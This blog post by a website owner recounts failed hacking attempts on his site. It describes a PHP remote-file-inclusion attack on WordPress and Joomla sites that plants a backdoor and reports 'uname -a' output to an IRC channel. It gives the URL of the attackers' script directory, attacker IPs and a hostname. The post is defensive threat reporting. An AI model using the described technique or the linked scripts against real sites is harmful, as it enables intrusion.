Well, it seems my site is a high target by Indonesian, Korean, Russian, Saudi Arabian and Italiano hacker groups(to name just a few). Once recent attack (that failed, by the way) led me to Italy, where I found all their scripts they use to attack other web sites ( http://labor.labcei.unimore.it/68049/guppy467/users/ proxied behind the 61.250.92.0/24 network). The scripts use a flaw in PHP where they append the url of their scripts to the url of a persons php page on their site, often targetting Word Press and Joomla. Once done, if the site is vulnerable, it creates a back door for them into the site, as well as sends back all the details of the vulnerable sites OS information (uname -a) to an IRC channel.
I managed to figure out where this IRC channel was and sat in for a little while this afternoon. I watched, as automated bots sent in links to websites that are vulnerable to their attack. Im on the fence as to what I should do at this point. On one hand, I’d like to turn them in, but on the other hand, I doubt anything will be done considering these people are from over seas, and are probably masking their true IP address.
Here is one latest attacker today on my site,
Date: 08/19/09 13:37:58
IP: 124.244.251.180
Hostname-Resolved: 124244251180.ctinets.com
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)
If you go here: http://www.ip2location.com/demo.aspx , you will see that they are from Hong Kong(or proxied from there).
Its difficult to police the web, and I have no intention of doing so. I don’t get paid to do so, and really could care less what these people do, so long as they can’t get into my site, but another side of me would like to see some justice in the matter.
So, block your websites from Korean, russia and china subnets, and be on the lookout for any traffic coming from an ip address of 72.9.225.69. That IP belongs to several websites that sit on the one IP, all from the same hacker crew who go by the name of “racrew” or “radio@ctive crew”. if you have a wordpress or joomla site, be sure you are patched 100%!